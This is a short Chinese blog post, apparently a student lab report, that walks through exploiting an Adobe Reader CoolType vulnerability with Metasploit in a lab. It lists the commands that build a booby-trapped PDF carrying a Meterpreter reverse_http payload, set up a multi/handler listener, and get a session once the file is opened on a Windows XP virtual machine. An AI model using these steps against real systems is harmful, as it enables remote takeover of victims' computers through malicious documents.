博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
20145322 Exp5 Adobe阅读器漏洞攻击
阅读量:5164 次
发布时间:2019-06-13

本文共 427 字,大约阅读时间需要 1 分钟。

20145322 Exp5 Adobe阅读器漏洞攻击

实验过程

IP:kali:192.168.1.102 windowsxp :192.168.1.119

msfconsole进入控制台

使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块

设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_http

使用命令show options来确定需要修改的参数。

使用命令exploit生成5333.pdf

885288-20170417112644759-1787716685.jpg

退出并重新进入msf平台,使用命令 use exploit/multi/handler进入监听模式,设置好参数,执行exploit等待被攻击者的接听。

把生成的5322.pdf移动到winxp里面,并打开

885288-20170417115215837-947498523.jpg

连接成功

885288-20170417115228446-1212170633.jpg

885288-20170417115304384-768934797.jpg

转载于:https://www.cnblogs.com/HZW20145322/p/6722223.html

你可能感兴趣的文章
c#项目开发常见问题
查看>>
Python--数据类型之一 数字(Number)和String(字符串)
查看>>
SQL 数据插入、删除 大数据
查看>>
并发性单线程服务器
查看>>
java.sql.SQLException: 无效的列索引
查看>>
RedisTemplate实现分布式锁
查看>>
Json解析工具Jackson(注解)
查看>>
spark-sql(spark sql cli)客户端集成hive
查看>>
[算法总结] 13 道题搞定 BAT 面试——字符串
查看>>
struts自定义拦截器实现
查看>>
python pandas数据分析基础入门2——(数据格式转换、排序、统计、数据透视表)...
查看>>
node.js安装
查看>>
python_if判断_一_基础
查看>>
安装drupal对服务器环境的要求
查看>>
各数据库连接maven配置
查看>>
Java课程寒假之《人月神话》有感之三
查看>>
[LeetCode 题解]: Permutation Sequcence
查看>>
Hibernate的常用关键类以及接口介绍
查看>>
linux 操作记录
查看>>
利用 squid 反向代理提高网站性能
查看>>